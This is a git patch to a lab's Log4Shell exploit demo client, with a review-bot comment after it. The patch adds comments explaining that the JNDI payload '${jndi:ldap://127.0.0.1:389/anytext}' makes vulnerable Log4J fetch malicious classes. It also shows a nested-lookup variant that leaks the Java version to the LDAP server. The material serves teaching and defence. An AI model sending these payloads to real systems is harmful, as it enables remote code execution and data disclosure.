From 811f716da18f9e2a47dd1bbe5c642d7eaf933383 Mon Sep 17 00:00:00 2001
From: Lukas Arnold <lukas.arnold@stud.tu-darmstadt.de>
Date: Wed, 22 Jun 2022 17:23:18 +0200
Subject: [PATCH] Adds more details about the string sent by the exploit

---
 .../src/main/java/de/seemoo/netsec/Log4ShellClient.java  | 9 ++++++++-
 1 file changed, 8 insertions(+), 1 deletion(-)

diff --git a/exploit/src/main/java/de/seemoo/netsec/Log4ShellClient.java b/exploit/src/main/java/de/seemoo/netsec/Log4ShellClient.java
index b432113..4cbf8b6 100644
--- a/exploit/src/main/java/de/seemoo/netsec/Log4ShellClient.java
+++ b/exploit/src/main/java/de/seemoo/netsec/Log4ShellClient.java
@@ -23,8 +23,15 @@ public class Log4ShellClient {
 
             // Sends the malicious message to trigger the remote code execution.
             // The message references to the LDAP server simultaneously running on port 389.
-            // Vulnerable Log4J version will contact it and download malicious class files.
+            // A vulnerable Log4J version will contact it and download malicious class files.
             // It is important to put any string after the last slash, otherwise the attack won't work.
+
+            // Furthermore, it is also possible to replace 'anytext' with even more lookups.
+            // They will be evaluated before the request is sent to the LDAP server.
+            // Henceforth, one can send the string '${jndi:ldap://127.0.0.1:389/${java:version}}' which first
+            // evaluates the Java version and then sends the LDAP request.
+            // See: https://logging.apache.org/log4j/2.x/manual/lookups.html
+
             writer.println("${jndi:ldap://127.0.0.1:389/anytext}");
 
             writer.close();
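Review bot: The added comment block on nested lookups says "Henceforth" where "For example" is meant, and it never states the consequence a reader should take away: because the inner lookup is resolved before the request goes out, its value travels to the LDAP server in the request path. I would reword the example as `// For example, '${jndi:ldap://127.0.0.1:389/${java:version}}' resolves the Java version first, so that value is disclosed to the LDAP server in the request path.` A closing line for defenders would also fit this demo, e.g. `// Mitigation: run a Log4J release that no longer evaluates lookups in log messages and block outbound LDAP from logging hosts.` The enclosing method starts and ends outside the hunk, so whether `writer` is closed on the error path cannot be judged from here.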
-- 
GitLab